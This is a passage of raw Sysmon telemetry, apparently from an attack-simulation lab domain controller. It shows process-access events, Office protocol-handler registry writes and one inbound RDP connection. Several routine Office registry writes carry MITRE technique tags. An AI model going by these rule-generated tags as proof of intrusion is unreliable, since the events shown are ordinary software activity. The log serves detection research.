14:57:44.577{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-3E0D-00000000BB01}4268C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 354300x800000000000000076039Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:43.021{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-43468-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 13241300x800000000000000076038Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.561{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{04082FC6-E032-49F2-A263-FE64E9DA1FA3}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 13241300x800000000000000076037Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1122SetValue2021-04-20 14:57:44.530{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\CLSID\{02AF6DD2-77E6-44DF-B3E1-57CF1476D8EA}\InprocServer32\(Default)C:\Program Files\Microsoft Office\Root\VFS\System\FM20.DLL 10341000x800000000000000076036Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.498{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-3D0D-00000000BB01}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076035Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.483{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-3D0D-00000000BB01}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076034Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.483{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-3D0D-00000000BB01}1512C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076033Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.389{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-3C0D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076032Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.373{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-3C0D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076031Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.373{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-3C0D-00000000BB01}6440C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076030Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.295{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-3B0D-00000000BB01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000076029Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.280{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-3B0D-00000000BB01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076028Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.280{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-3B0D-00000000BB01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 10341000x800000000000000076027Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.233{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EBE8-607E-3A0D-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x800000000000000076026Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\tel\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076025Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\skypecast15\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076024Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\sips\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076023Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\sip\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076022Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ma-filelink\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076021Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ma-chan\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076020Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Lync15classic\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076019Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Lync15\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076018Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\im\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076017Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.233{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\conf\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076016Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\callto\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\lync.exe "%%1" 13241300x800000000000000076015Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNoteDesktop.URL.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 13241300x800000000000000076014Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNoteDesktop\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 10341000x800000000000000076013Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.217{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBE8-607E-3A0D-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000076012Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:44.217{A7A01FEF-EBDA-607E-C60C-00000000BB01}35124312C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{A7A01FEF-EBE8-607E-3A0D-00000000BB01}5640C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 13241300x800000000000000076011Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote.URL.16\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 13241300x800000000000000076010Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\OneNote\shell\Open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\ONENOTE.EXE" /hyperlink "%%1" 13241300x800000000000000076009Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\ms-word\shell\open\command\(Default)C:\Program Files\Microsoft Office\Root\Office16\protocolhandler.exe "%%1" 13241300x800000000000000076008Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\webcals\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000076007Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\webcal\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000076006Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\stssync\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000076005Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.webcal.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000076004Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.217{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.stssync.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000076003Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.mailto.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -c IPM.Note /mailto "%%1" 13241300x800000000000000076002Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\Outlook.URL.feed.15\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000076001Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\oms\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Client\AppVLp.exe" rundll32.exe C:\Program Files\Microsoft Office\Root\Office16\OMSMAIN.DLL, OmsProtocolHandler %%1 13241300x800000000000000076000Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.202{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\mailto\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" -c IPM.Note /mailto "%%1" 13241300x800000000000000075999Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\feeds\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075998Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 14:57:44.186{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeHKCR\feed\shell\open\command\(Default)"C:\Program Files\Microsoft Office\Root\Office16\OUTLOOK.EXE" /share "%%1" 13241300x800000000000000075997Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.localT1042SetValue2021-04-20 